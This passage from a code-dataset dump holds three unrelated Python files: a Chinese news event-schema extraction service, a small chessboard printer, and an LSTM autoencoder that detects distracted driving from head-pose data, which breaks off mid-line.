utf-8 -*-\n\nimport re\nimport io\nimport json\nimport requests\n# from ltp_class import HIT_LTP\nimport model_loading as mdld\nimport uuid\nfrom time_utils import timestamp_to_date,current_time\nimport fixativedomain_loading as fdld\nimport logging.config\n\nlogging.config.fileConfig(\"logging.conf\")\nlogging = logging.getLogger('main')\n\nclass Event_Supervision():\n\n def __init__(self):\n # MODELDIR = 'ltp_data_v3.4.0'\n # self.hit_ltp = HIT_LTP(MODELDIR)\n self.ner_type = ['mg', 'gg', 'st', 'hy', 'bg', 'nr', 'nt', 'rw', 'fss', 'jj', 'hgzb', 'zczt', 'hylx', 'zqgs']\n self.neg_sub = ['公司', '该公司', '我省', '记者', '这']\n self.neg_v = ['获悉','截止','如下','显示','有','满','工作','共有','没','是','远离','称','说','表示','认为','指出','强调']\n logging.info(\"Event_Supervision initial ... \")\n\n # 从不同的接口获取 event schema\n def get_event_schema_(self,doc):\n # doc = json.loads(line)\n info_id = doc['id']\n publishAt = doc['publishAt']\n title = doc['title'].strip()\n abstract = doc['abstract'].strip()\n\n logging.info(\"title: {}\".format(title))\n logging.info(\"abstract: {}\".format(abstract))\n\n att_eventype_flag = 0\n # 考虑 event_type, scope, source 事件类型、(篇章级、句子级),(资讯、研报、公告)\n # 首先固定域篇章级\n\n # 篇章级过完再过句子级\n title_ = self.semantic_clean(title)\n title_ = title.replace(\" \", \"。\").replace(\"\\t\", \"。\").replace(\";\", \"。\").replace(\";\", \"。\").replace(\",\",\n \"。\").replace(\n \",\", \"。\").replace(\" \", \"。\")\n abstract_ = self.semantic_clean(abstract)\n abstract_ = abstract_.replace(\" \", \"。\").replace(\"\\t\", \"。\").replace(\";\", \"。\").replace(\";\", \"。\").replace(\",\",\n \"。\").replace(\n \",\", \"。\").replace(\" \", \"。\")\n s_list = abstract_.split(\"。\") + title_.split(\"。\")\n schemas = []\n # 先进行篇章级的抽取,篇章级无法抽取的再进一步进行句子级别或者开放域的抽取;该部分认为一篇文章可以有多个篇章级固定域类型\n schemas = fdld.extract_schema.get_schema_article(doc)\n\n if len(schemas) > 0:\n for item in schemas:\n # pass\n ners = []\n schema_info = {}\n schema_id = str(uuid.uuid1()).replace('-', '')\n createAt = current_time()\n schema_info['id'] = schema_id\n schema_info['infoId'] = info_id\n schema_info['content'] = abstract\n schema_info['paragraph'] = abstract\n schema_info['extractScope'] = \"固定域篇章级\"\n schema_info['schemaType'] = item[1]\n schema_info['sourceType'] = \"资讯\"\n schema_info['schema'] = item\n schema_info['ners'] = ners # 此处ner怎么获取,或者也是用ltp包来获取ner,或者是对提取出来的schema进行ner识别\n schema_info['publishAt'] = publishAt\n schema_info['occurAt'] = publishAt\n # schema_info['createAt'] = createAt\n # schema_info['deleteFlag'] = \"0\"\n # schema_info['humanFlag'] = \"0\"\n\n if schemas != []:\n return schemas\n # 篇章级抽取的输入为整个文章信息,句子级别的抽取输入为某一个句子\n for s in s_list:\n\n TMP = self.get_standard_datetime(s, publishAt)\n\n if len(s.strip()) < 6: # 太短的句子不做处理\n # continue\n # 固定域句子级抽取\n # 直接调用schema抽取的服务\n # fixativedomain_url = ''\n # schema_param = {}\n # schema_param['s'] = s\n # schema_param['publishAt'] = publishAt\n # schema_param = json.dumps(schema_param).encode('UTF-8')\n # response = requests.post(url=fixativedomain_url,data = schema_param)\n # schema_response = response.json()\n schema_response = fdld.extract_schema.get_schema_sen(s,publishAt)\n\n # 得到返回的一句话所有的schema列表后,遍历得到每一个schema,然后给schema加上相对应的句子外部信息\n if len(schema_response) > 0:\n for item in schema_response:\n # pass\n ners = []\n schema_info = {}\n schema_id = str(uuid.uuid1()).replace('-', '')\n createAt = current_time()\n schema_info['id'] = schema_id\n schema_info['infoId'] = info_id\n schema_info['content'] = s\n schema_info['paragraph'] = abstract\n schema_info['extractScope'] = \"固定域句子级\"\n schema_info['schemaType'] = item[1]\n schema_info['sourceType'] = \"资讯\"\n schema_info['schema'] = item\n schema_info['ners'] = ners #此处ner怎么获取,或者也是用ltp包来获取ner,或者是对提取出来的schema进行ner识别\n schema_info['publishAt'] = TMP\n schema_info['occurAt'] = TMP\n # schema_info['createAt'] = createAt\n # schema_info['deleteFlag'] = \"0\"\n # schema_info['humanFlag'] = \"0\"\n schemas.append(schema_info)\n\n att_eventype_flag += 1\n\n\n # 开放域句子级抽取(如果固定域不论篇章级还是句子级抽取过,则开放域都不抽取)\n if att_eventype_flag == 0:\n # 首先过滤掉句式复杂的或对于事件描述模糊的句子\n if not self.s_filter(s):\n # 利用自己领域的分词 + ltp 的 parser\n s_seg = self.split_sentence(s)\n # 开放域抽取的前提是句子中必须出现 ner\n ori_ner_info = [seg for seg in s_seg if seg['nature'] in ['ns', 'nt', 'nr'] or len(\n set(seg['ner'].split(',')) & set(self.ner_type)) > 0]\n if len(ori_ner_info) == 0:\n continue\n # print(222222222222222222222)\n # TMP = self.get_standard_datetime(s, publishAt)\n # print(3333333333333333333333333333)\n s_seg = mdld.hit_ltp.std_seg_with_hanlp(s,\n hanlp_terms=s_seg) # 需要利用 hanlp 分词 + ltp 词性 进行 dp parser\n s_seg = self.special_entity_merge_segment(s, s_seg) # 处理 《》、()等语义完备的实体词\n words = [term['word'] for term in s_seg]\n postags = [term['nature'] for term in s_seg]\n result = mdld.hit_ltp.get_parser_triple(s, words=words, postags=postags)\n core_words_info = result['core_words_info']\n triple_info = result['triple_info']\n ner_info = result['ner_info']\n core_words = [item['word'] for item in core_words_info]\n for triple in triple_info:\n if self.triple_filter(triple, ori_ner_info): # triple 过滤条件\n continue\n if triple['triple'][1] in core_words:\n schema_info = {}\n schema = [{\"name\": triple['triple'][0],\n \"oriName\": triple['triple'][0],\n \"necessary\": 1,\n \"spanStart\": None,\n \"type\": \"Sub\"},\n {\"name\": triple['triple'][1],\n \"oriName\": triple['triple'][1],\n \"necessary\": 1,\n \"spanStart\": None,\n \"type\": \"v\"},\n {\"name\": triple['triple'][2],\n \"oriName\": triple['triple'][2],\n \"necessary\": 1,\n \"spanStart\": None,\n \"type\": \"Obj\"}]\n # ners = ori_ner_info\n ners = []\n for item in ori_ner_info:\n ner = {}\n ner['name'] = item['word']\n ner['type'] = item['nature']\n ner['spanStart'] = item['offset']\n ner['oriName'] = item['realName']\n ner['necessary'] = 1\n ners.append(ner)\n\n schema_id = str(uuid.uuid1()).replace('-', '')\n createAt = current_time()\n schema_info['id'] = schema_id\n schema_info['infoId'] = info_id\n schema_info['content'] = s\n schema_info['paragraph'] = abstract\n schema_info['extractScope'] = \"开放域句子级\"\n schema_info['schemaType'] = triple['triple'][1]\n schema_info['sourceType'] = \"资讯\"\n schema_info['schema'] = schema\n schema_info['ners'] = ners\n schema_info['publishAt'] = TMP\n schema_info['occurAt'] = TMP\n # schema_info['createAt'] = createAt\n # schema_info['deleteFlag'] = \"0\"\n # schema_info['humanFlag'] = \"0\"\n schemas.append(schema_info)\n\n logging.info(\n \"triple: 【{}】-【{}】-【{}】-sentene:{}\".format(triple['triple'][0], triple['triple'][1],\n triple['triple'][2], s))\n logging.info(\"ners: {}\".format([x['name'] for x in ners]))\n logging.info(\"TMP: {}\".format(timestamp_to_date(int(TMP)).split(' ')[0]))\n\n return schemas\n\n\n # 因为之前调用已经是一篇文章一篇文章进行调用,所以此处希望对一篇文章的相关信息传入,然后进行相关的schema提取\n def get_event_schema(self, data_file_):\n c = 0\n schemas = []\n with io.open(data_file_, \"r\", encoding='utf-8') as f:\n while True:\n line = f.readline()\n if len(line) > 0 and c < 10:\n c+=1\n print(c)\n schemas = self.get_event_schema_(line)\n\n else:\n break\n \n print(len(schemas))\n return schemas\n \n def get_articlevel_eventype(self, title, abstract):\n \n return ''\n \n \n def get_senlevel_eventype(self, s):\n \n return ''\n \n def triple_filter(self, triple, ner_info):\n if triple['triple'][0] == \"\": # 主语缺失不为事件\n return 1\n if triple['triple'][0] in self.neg_sub:\n return 1\n if triple['triple'][1] in self.neg_v:\n return 1\n \n # 如果主语或宾语中不包含 ner,进行过滤\n condition = 0\n sub_obj = triple['triple'][0]+triple['triple'][1]\n ners = [x['word'] for x in ner_info]\n for ner in ners:\n if ner in sub_obj:\n condition += 1\n break\n if condition == 0:\n return 1\n return 0\n \n # 去 “电” 头、去括号、【】 等,用于事件抽取\n def semantic_clean(self, text):\n '''\n # 可能是开头,也可能是结尾,所以需要判断索引位置\n # 理论上一个新闻 text 中只会存在一个 “电头” \n features = ['日电','日讯','日消息','日报道','网讯','网消息']\n for fea in features:\n if fea in text:\n fea_ids = text.index(fea)\n if fea_ids < int(1/2 * len(text)):\n text = text[fea_ids+len(fea):]\n break\n '''\n # 剔除掉 ()、() 中的 “不规范信息”\n special_signs = [\"(\", \"(\", \"【\", \"[\", '<']\n signs_infos_list = self.get_special_chunk(text)\n for item in signs_infos_list:\n if item['type'] in special_signs:\n text = text.replace(item['chunk_str'], '')\n return text\n \n # 抽取出 text 中所有的 special sign string 及 offset\n def get_special_chunk(self, text):\n signs_infos_list = []\n special_signs = [['(', ')'], ['(', ')'], ['<','>'],['《', '》'], ['【', '】'],['[',']'],['{','}'],\n ['「', '」'], ['‘', '’'], ['\\\"', '\\\"'],['“', '”'], ['\\'', '\\'']]\n special_signs_rgx_info = []\n for i in range(0,len(special_signs)):\n rgx = re.compile(r'[{0}](.*?)[{1}]'.format(special_signs[i][0],special_signs[i][1]))\n type = special_signs[i][0]\n temp_dic = {}\n temp_dic['rgx'] = rgx\n temp_dic['type'] = type\n special_signs_rgx_info.append(temp_dic)\n for x in special_signs_rgx_info:\n item = x['rgx']\n type = x['type']\n item_rgx = item.finditer(text)\n if item_rgx is not None:\n for m in item_rgx:\n signs_infos = {}\n signs_infos['offset'] = m.span()\n signs_infos['chunk_str'] = m.group(0)\n signs_infos['type'] = type\n signs_infos_list.append(signs_infos)\n return signs_infos_list\n\n def special_entity_merge_segment(self, s, segs):\n signs_infos_list = self.get_special_chunk(s)\n words_info = {}\n for sign_info in signs_infos_list:\n offset_start = sign_info['offset'][0]\n words_info[offset_start] = {}\n words_info[offset_start]['chunk_str'] = sign_info['chunk_str']\n words_info[offset_start]['offset_end'] = sign_info['offset'][1]\n words_info[offset_start]['type'] = sign_info['type']\n segs_ = []\n new_word = None\n end_offset = None\n for seg in segs:\n offset_start = seg['offset']\n if offset_start == end_offset:\n new_word = None\n end_offset = None\n if offset_start in words_info and end_offset is None:\n new_word = words_info[offset_start]['chunk_str']\n seg['word'] = new_word\n seg['offset'] = offset_start\n seg['nature'] = 'n'\n segs_.append(seg)\n end_offset = words_info[offset_start]['offset_end']\n if new_word is None:\n segs_.append(seg)\n return segs_\n\n def s_filter(self, s):\n features = ['格隆汇','龙虎榜', '罚决字', '丨', '|','?', \n ':', '【','[','!',':', '!','?']\n for fea in features:\n if fea in s:\n return 1\n # 利用词法句法分析初步判断哪些句子“语义不完备”主要为缺失主语\n terms = self.split_sentence(s)\n nature_list = [term['nature'] for term in terms]\n # 这、也、并、且、和、及、以及\n if len(nature_list) > 0:\n if nature_list[0].startswith(('c', 'd', 'r')):\n return 1\n condition = 0\n # 默认为句子长度,因为 存在 增持 nz,且假设句子成立必须存在谓词\n v_idx = len(nature_list)\n for i in range(len(nature_list)):\n if nature_list[i].startswith('v'):\n v_idx = i\n break\n for nature in nature_list[0: v_idx]:\n if 'n' in nature:\n condition += 1\n break\n if condition ==0:\n return 1\n return 0\n \n def split_sentence(self, sen):\n nlp_url = 'http://hanlp-nlp-service:31001/hanlp/segment/segment'\n try:\n cut_sen = dict()\n cut_sen['content'] = sen\n cut_sen['customDicEnable'] = True\n data = json.dumps(cut_sen).encode(\"UTF-8\")\n cut_response = requests.post(nlp_url, data=data, headers={'Connection':'close'})\n cut_response_json = cut_response.json()\n return cut_response_json['data']\n except Exception as e:\n logging.exception(\"Exception: {}\".format(e))\n logging.exception(\"hanlp-nlp-service error\")\n logging.exception(\"sentence: {}\".format(sen))\n return []\n \n def get_standard_datetime(self, sen, publishAt):\n url = 'http://datetime-featurextract-service:31001/datetime'\n TMP = ''\n try:\n params = dict()\n params['content'] = sen\n params['publishAt'] = publishAt\n params = json.dumps(params).encode(\"UTF-8\")\n response = requests.post(url, data=params, headers={'Connection':'close'})\n response_json = response.json()\n except Exception as e:\n logging.exception(\"Exception: {}\".format(e))\n logging.exception(\"get_standard_datetime error\")\n return publishAt\n for item in response_json:\n if item['type'] == 'TMP':\n TMP = item['time_stamp'][0]\n return TMP\n for item in response_json:\n TMP = item['time_stamp'][0]\n return TMP\n return TMP\n \n def release(self):\n mdld.hit_ltp.release()\n \n \n \n \nif __name__ == '__main__':\n \n event_supervision = Event_Supervision()\n \n s = '8月全国乘用车市场共售出新车156.4万辆'\n s = '

7月25日午间公告,公司董事会沉痛公告,近日从独立董事梁烽先生家属获知,梁烽先生因病不幸逝世。梁烽先生现任公司第一届董事会独立董事、审计委员会主任委员。

梁烽先生去世后,公司董事会成员减少至8人,其中独立董事减少至2人,导致公司董事会中独立董事所占比例低于1/3,根据相关法律、法规规定,公司董事会将尽快按照相关程序增补新的独立董事并及时公告。在新的独立董事选举产生之前,公司独立董事事务暂由陈汉亭先生、彭丽霞女士两位独立董事履行。

习近平指出,这是最后一个晚上

'\n result = []\n\n abstract_info = {}\n abstract_info['id'] = '121313123123'\n abstract_info['title'] = '光弘科技独立董事梁烽先生逝世'\n abstract_info['publishAt'] = '1571919900476'\n abstract_info['abstract'] = s\n\n result.extend(event_supervision.get_event_schema_(abstract_info))\n print(result)\n # TMP = event_supervision.get_standard_datetime(s, 1546272000000)\n #\n # print(TMP)\n #\n #\n # event_supervision.release()\n \n \n \n \n \n \n \n \n \n \n pass","repo_name":"cwgong/eventengine-schemextract1-timetl-service","sub_path":"event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":19910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"3286443441","text":"class ChessBoard:\n \"\"\"\n This class makes chessboard by defining two parameters:\n _____________\n\n - width (number of chessboard cells in row)\n - height (number of chessboard cells in height)\n\n \"\"\"\n\n def __init__(self, width: int, height: int):\n self.__width = width\n self.__height = height\n\n def print_chessboard(self):\n \"\"\" This function prints chessboard\"\"\"\n\n res = ''\n\n # creating output row\n # default chessboard has even number of cells\n for i in range(0, self.__width):\n if i % 2: # number of cell pairs equal quantity of even numbers, counting by width index\n res = res + '█░' # '█░' - one cell pair\n\n # if number of cells is odd - we must add '█'\n if self.__width % 2 != 0:\n res = res + '█'\n # тест не читает все принты. аппендь в функцию!!!!!!!!!!!!!!!!!!!!!!\n # cycle of creating chessboard\n for i in range(0, self.__height):\n # if number of cells is even, cycle adds '░' in the beginning and removes last cell\n if i % 2 and self.__width != 0:\n print('░' + res[:self.__width - 1])\n else:\n # if number of cells is odd - cycle prints original row\n print(res)\n\n\nif __name__ == \"__main__\": # pragma: no cover\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('width', type=int, help='Defines width of chessboard.')\n parser.add_argument('height', type=int, help='Defines height of chessboard.')\n try:\n args = parser.parse_args()\n t = ChessBoard(args.width, args.height)\n t.print_chessboard()\n except:\n parser.print_help()\n","repo_name":"paivazov/elementary_tasks","sub_path":"chess_board(Task_1)/chess_board.py","file_name":"chess_board.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"30338038359","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom numpy import genfromtxt\r\nimport pandas as pd\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\nfrom torchvision import datasets\r\nfrom torch.utils.data import ConcatDataset, TensorDataset, Dataset, DataLoader, random_split \r\nimport torch.optim as optim\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.cluster import SpectralClustering\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\nimport os\r\nos.chdir(\"U:\\Research Projects\\FHWA-EAR\\RetinaFace\")\r\n\r\n# read in data\r\nlist_of_EventTable = ['eventID', 'anonymousParticipantID', 'eventStart', \r\n 'secondaryTask1', 'secondaryTask1StartTime', 'secondaryTask1EndTime', \r\n 'secondaryTask2', 'secondaryTask2StartTime', 'secondaryTask2EndTime',\r\n 'secondaryTask3', 'secondaryTask3StartTime', 'secondaryTask3EndTime']\r\norig_data = pd.read_excel('EventTableFull.xlsx', usecols = list_of_EventTable)\r\n\r\n# only work on cell phone use\r\nmask_bool1 = []\r\nmask_bool2 = []\r\nmask_bool3 = []\r\nfor i in orig_data.secondaryTask1:\r\n mask_bool1.append('Cell' in i)\r\nfor i in orig_data.secondaryTask2:\r\n mask_bool2.append('Cell' not in i)\r\nfor i in orig_data.secondaryTask3:\r\n mask_bool3.append('Cell' not in i)\r\nmask_bool1 = pd.array(mask_bool1, dtype = 'boolean')\r\nmask_bool2 = mask_bool2\r\nmask_bool3 = mask_bool3\r\n\r\norig_data.loc[np.arange(0, len(mask_bool2))[mask_bool2], 'secondaryTask2StartTime'] = 0\r\norig_data.loc[np.arange(0, len(mask_bool2))[mask_bool2], 'secondaryTask2EndTime'] = 0\r\norig_data.loc[np.arange(0, len(mask_bool3))[mask_bool3], 'secondaryTask3StartTime'] = 0\r\norig_data.loc[np.arange(0, len(mask_bool3))[mask_bool3], 'secondaryTask3EndTime'] = 0\r\n\r\nlist_of_EventTable.remove('secondaryTask1')\r\nlist_of_EventTable.remove('secondaryTask2')\r\nlist_of_EventTable.remove('secondaryTask3')\r\n\r\norig_data_cell = orig_data.loc[mask_bool1, list_of_EventTable].to_numpy()\r\norig_data = orig_data.loc[:, list_of_EventTable].to_numpy()\r\n#% extract normal and abnormal events from the whole folder\r\nos.chdir(\"U:\\Research Projects\\FHWA-EAR\\RetinaFace\\RetinaFaceData\")\r\nlist_of_filenames = os.listdir(\"./\") \r\n\r\n#% extract distracted events\r\nid_list = list(orig_data_cell[:, 0])\r\npitch_abnormal = []\r\nyaw_abnormal = []\r\nroll_abnormal = []\r\nnormalmax = 90\r\nstepnum = 0\r\nfor i in list_of_filenames: # index from retina face folder\r\n stepnum += 1 \r\n num = int(i.split('_')[3]) # detach the index id\r\n try:\r\n rowID = list(id_list).index(num) # match the eventID in EventTable.csv\r\n # read first secondary task\r\n if orig_data_cell[rowID, 3] > 0:\r\n starttime = orig_data_cell[rowID, 3]\r\n endtime = orig_data_cell[rowID, 4] \r\n temp_data = pd.read_csv(i, delimiter = ',', usecols = ['Pitch', 'Roll', 'Yaw', 'frameTime'])\r\n temp_data = temp_data.to_numpy()\r\n distractrange = np.arange(temp_data.shape[0])[(temp_data[:, 3] > starttime) & (temp_data[:, 3] < endtime)]\r\n if len(distractrange) > normalmax:\r\n pitch_abnormal.append(temp_data[distractrange, 0])\r\n roll_abnormal.append(temp_data[distractrange, 1])\r\n yaw_abnormal.append(temp_data[distractrange, 2])\r\n # read second secondary task\r\n if orig_data_cell[rowID, 5] > 0:\r\n starttime = orig_data_cell[rowID, 5]\r\n endtime = orig_data_cell[rowID, 6] \r\n temp_data = pd.read_csv(i, delimiter = ',', usecols = ['Pitch', 'Roll', 'Yaw', 'frameTime'])\r\n temp_data = temp_data.to_numpy()\r\n distractrange = np.arange(temp_data.shape[0])[(temp_data[:, 3] > starttime) & (temp_data[:, 3] < endtime)]\r\n if len(distractrange) > normalmax:\r\n pitch_abnormal.append(temp_data[distractrange, 0])\r\n roll_abnormal.append(temp_data[distractrange, 1])\r\n yaw_abnormal.append(temp_data[distractrange, 2])\r\n # read third secondary task\r\n if orig_data_cell[rowID, 7] > 0:\r\n starttime = orig_data_cell[rowID, 7]\r\n endtime = orig_data_cell[rowID, 8] \r\n temp_data = pd.read_csv(i, delimiter = ',', usecols = ['Pitch', 'Roll', 'Yaw', 'frameTime'])\r\n temp_data = temp_data.to_numpy()\r\n distractrange = np.arange(temp_data.shape[0])[(temp_data[:, 3] > starttime) & (temp_data[:, 3] < endtime)]\r\n if len(distractrange) > normalmax:\r\n pitch_abnormal.append(temp_data[distractrange, 0])\r\n roll_abnormal.append(temp_data[distractrange, 1])\r\n yaw_abnormal.append(temp_data[distractrange, 2]) \r\n except ValueError:\r\n flag = 0\r\n\r\n# also extract normal events\r\nid_list = list(orig_data[:, 0])\r\npitch_normal = []\r\nyaw_normal = []\r\nroll_normal = []\r\nnormalcount = 0\r\nnormalrange = np.arange(0, normalmax)\r\nfor i in list_of_filenames: # index from retina face folder\r\n stepnum += 1 \r\n num = int(i.split('_')[3]) # detach the index id\r\n try:\r\n rowID = list(id_list).index(num) # match the eventID in EventTable.csv\r\n # read first secondary task\r\n if orig_data[rowID, 3] == 0:\r\n temp_data = pd.read_csv(i, delimiter = ',', usecols = ['Pitch', 'Roll', 'Yaw', 'frameTime'])\r\n temp_data = temp_data.to_numpy()\r\n if temp_data.shape[0] > normalmax:\r\n normalcount += 1\r\n pitch_normal.append(temp_data[normalrange, 0])\r\n roll_normal.append(temp_data[normalrange, 1])\r\n yaw_normal.append(temp_data[normalrange, 2]) \r\n except ValueError:\r\n flag = 0\r\n \r\n#% some descriptive plots\r\nlen_abnormal = np.zeros(len(pitch_abnormal))\r\nfor i in range(len(pitch_abnormal)):\r\n len_abnormal[i] = len(pitch_abnormal[i])\r\n\r\nplt.hist(len_abnormal, bins = np.arange(0, 150, 5))\r\n\r\n#%% generate sliding windows\r\nstep = normalmax\r\ndef sliding_window(datas, steps = 2, width = step):\r\n win_set=[]\r\n for event in range(len(datas)):\r\n for i in np.arange(0, len(datas[event]), steps):\r\n temp = datas[event][i : i + width]\r\n if temp.shape[0] == width:\r\n win_set.append(temp)\r\n return win_set\r\n\r\npitch_abnormal_window = np.array(sliding_window(pitch_abnormal))\r\nroll_abnormal_window = np.array(sliding_window(roll_abnormal))\r\nyaw_abnormal_window = np.array(sliding_window(yaw_abnormal))\r\npitch_normal_window = np.array(sliding_window(pitch_normal))\r\nroll_normal_window = np.array(sliding_window(roll_normal))\r\nyaw_normal_window = np.array(sliding_window(yaw_normal))\r\n\r\ndata_normal_window = np.zeros((pitch_normal_window.shape[0], pitch_normal_window.shape[1], 3))\r\ndata_normal_window[:, :, 0] = pitch_normal_window\r\ndata_normal_window[:, :, 1] = roll_normal_window\r\ndata_normal_window[:, :, 2] = yaw_normal_window\r\n\r\ndata_abnormal_window = np.zeros((pitch_abnormal_window.shape[0], pitch_abnormal_window.shape[1], 3))\r\ndata_abnormal_window[:, :, 0] = pitch_abnormal_window\r\ndata_abnormal_window[:, :, 1] = roll_abnormal_window\r\ndata_abnormal_window[:, :, 2] = yaw_abnormal_window\r\n\r\ndata_full_window = np.concatenate([data_normal_window, data_abnormal_window], axis = 0)\r\nlabel_full = np.concatenate((np.zeros(data_normal_window.shape[0]), np.ones(data_abnormal_window.shape[0])))\r\n\r\nnon_missing_idx = ~np.isnan(data_full_window).any(axis=1).any(axis=1)\r\ndata_full_window = data_full_window[non_missing_idx, :, :]\r\nlabel_full = label_full[non_missing_idx]\r\n\r\ndata_full_window = np.divide((data_full_window-np.min(data_full_window)), (np.max(data_full_window)-np.min(data_full_window)))\r\n\r\n## shuffle data\r\nidx = np.arange(data_full_window.shape[0])\r\nnp.random.seed(2022)\r\nnp.random.shuffle(idx)\r\ntrain_window = data_full_window[idx, :, :]\r\nlabel_full = label_full[idx]\r\ntrain_window = torch.tensor(train_window, dtype = torch.float32)\r\nlabel_full = torch.tensor(label_full, dtype = torch.int)\r\n\r\ntrain_window_, val_window_ = train_test_split(train_window, test_size = 0.2, random_state = 2022)\r\ntrain_label_, val_label_ = train_test_split(label_full, test_size = 0.2, random_state = 2022)\r\ntrain_data_class = TensorDataset(train_window_, train_label_)\r\ntest_data_class = TensorDataset(val_window_, val_label_)\r\ntrain_loader_class = torch.utils.data.DataLoader(train_data_class, batch_size = 10, shuffle = True)\r\ntest_loader_class = torch.utils.data.DataLoader(test_data_class, batch_size = 10, shuffle = True)\r\n\r\n#%% define LSTM auto-encoder\r\nclass Lstm_encoder(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.lstm1 = nn.LSTM(input_size=normalmax, hidden_size=16)\r\n self.lstm2 = nn.LSTM(input_size=16, hidden_size=4)\r\n \r\n def forward(self, x):\r\n #reshape x to fit the input requirement of lstm\r\n x = x.permute(0, 2, 1)\r\n output, hn = self.lstm1(x)\r\n output, (hidden, cell) = self.lstm2(output)\r\n # output include all timestep, while hidden just include the last timestep.\r\n hidden = hidden.repeat((output.shape[0], 1, 1))\r\n return hidden\r\n\r\nclass Lstm_decoder(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.lstm1 = nn.LSTM(input_size=4, hidden_size=16)\r\n self.lstm2 = nn.LSTM(input_size=16, hidden_size=normalmax)\r\n \r\n def forward(self, x):\r\n # not need to reshape\r\n output, hn = self.lstm1(x)\r\n output, hn = self.lstm2(output)\r\n #reshape output\r\n output = output.permute(0, 2, 1)\r\n return output\r\n \r\nclass net(nn.Module):\r\n def __init__(self, *args):\r\n super().__init__()\r\n self.Lstm_encoder1 = args[0]\r\n self.Lstm_decoder1 = args[1]\r\n self.Lstm_encoder2 = args[2]\r\n self.Lstm_decoder2 = args[3]\r\n self.Lstm_encoder3 = args[4]\r\n self.Lstm_decoder3 = args[5]\r\n\r\n def forward(self, x):\r\n output1 = self.Lstm_encoder1(x[:, :, 0].unsqueeze(2))\r\n output1 = self.Lstm_decoder1(output1)\r\n output2 = self.Lstm_encoder2(x[:, :, 1].unsqueeze(2))\r\n output2 = self.Lstm_decoder2(output2)\r\n output3 = self.Lstm_encoder3(x[:, :, 2].unsqueeze(2))\r\n output3 = self.Lstm_decoder3(output3)\r\n output = torch.cat((output1, output2, output3), dim = 2)\r\n return output\r\n \r\n#% model functions\r\ndef train(model, device, train_loader, optimizer, epoch):\r\n model.train() #trian model\r\n for batch_idx, data in enumerate(train_loader):\r\n data = data.to(device)\r\n optimizer.zero_grad()\r\n output = model(data)\r\n\r\n ##calculate loss\r\n loss = 0\r\n for i in range(data.shape[0]):\r\n loss += F.mse_loss(output[i], data[i], reduction='mean')\r\n\r\n #loss = F.mse_loss(output, data)\r\n loss.backward()\r\n optimizer.step()\r\n # print result every 10 batch\r\n if batch_idx % 10 == 0:\r\n print('Train Epoch: {} ... Batch: {} ... Loss: {:.8f}'.format(epoch, batch_idx, loss))\r\n\r\ndef test(model, device, test_loader):\r\n model.eval() #evaluate model\r\n test_loss = 0\r\n with torch.no_grad():\r\n for data in test_loader:\r\n data = data.to(device)\r\n output = model(data)\r\n #calculate sum loss\r\n test_loss += F.mse_loss(output, data, reduction='mean').item()\r\n\r\n print('------------------- Test set: Average loss: {:.4f} ... Samples: {}'.format(test_loss, len(test_loader.dataset)))\r\n\r\n\r\n#% model training\r\ntrain_window_, val_window_ = train_test_split(train_window, test_size = 0.2, random_state = 2022)\r\n\r\ntrain_label_, val_label_ = train_test_split(label_full, test_size = 0.2, random_state = 2022)\r\n\r\ntrain_loader = torch.utils.data.DataLoader(train_window_, batch_size = 256, shuffle = True)\r\ntest_loader = torch.utils.data.DataLoader(val_window_, batch_size = 256, shuffle = False)\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n# model = net(Lstm_encoder(), Lstm_decoder())\r\nmodel = net(Lstm_encoder(), Lstm_decoder(), Lstm_encoder(), Lstm_decoder(), Lstm_encoder(), Lstm_decoder())\r\nmodel = model.to(device)\r\n\r\noptimizer = optim.Adam(model.parameters(), lr = 0.00001)\r\n\r\n# optimizer = torch.optim.SGD(model.parameters(), lr = 0.0001, momentum = 0.9)\r\n\r\nepochs = 500\r\n\r\nfor epoch in range(1, epochs + 1):\r\n train(model, device, train_loader, optimizer, epoch)\r\n test(model, device, test_loader)\r\n \r\n#%% unsupervised clustering\r\ndef model_embedding(model, input):\r\n model.eval()\r\n with torch.no_grad():\r\n output0 = model.Lstm_encoder1(input[:, :, 0].unsqueeze(2))\r\n output1 = model.Lstm_encoder2(input[:, :, 1].unsqueeze(2))\r\n output2 = model.Lstm_encoder3(input[:, :, 2].unsqueeze(2))\r\n output = torch.cat((output0, output1, output2), dim = 2)\r\n output = output.to('cpu').numpy()\r\n return output\r\n\r\nflag = False\r\n\r\nfor data in test_loader:\r\n data = data.to(device)\r\n output_ = model_embedding(model, data)\r\n if not flag:\r\n output = output_.copy()\r\n flag = True\r\n else:\r\n output = np.concatenate([output, output_])\r\n\r\nflag = False\r\nval_loader = torch.utils.data.DataLoader(train_window_, batch_size=256,shuffle=False)\r\n\r\nfor data in val_loader:\r\n data = data.to(device)\r\n output_ = model_embedding(model, data)\r\n if not flag:\r\n output = output_.copy()\r\n flag = True\r\n else:\r\n output = np.concatenate([output, output_])\r\n\r\noutput.shape, train_window.shape\r\n\r\n# try pca to reduce dimension\r\nfrom sklearn.decomposition import PCA\r\n\r\npca = PCA(n_components = 5)\r\npca.fit(output.squeeze(1))\r\n\r\nprint(pca.explained_variance_ratio_)\r\n\r\nvalid_2 = pca.transform(output.squeeze(1))\r\n\r\nl = ['blue' if t == 0 else 'red' for t in train_label_]\r\n\r\nplt.scatter(valid_2[:, 0], valid_2[:, 1], c=l)\r\nplt.show()\r\n\r\n#% unsupervised spectral clustering\r\nclustering = SpectralClustering(n_clusters=2, assign_labels='discretize', random_state=0).fit(output.squeeze(1))\r\n\r\nresult_label = clustering.labels_\r\n\r\ntrue_label = train_label_.numpy()\r\n\r\nprint(confusion_matrix(true_label, result_label))\r\n\r\n#%% supervised SVM\r\nfrom sklearn import svm\r\nclf = svm.SVC(kernel = 'poly', gamma = 200)\r\nclf.fit(output.squeeze(1), train_label_)\r\nsvm_label = 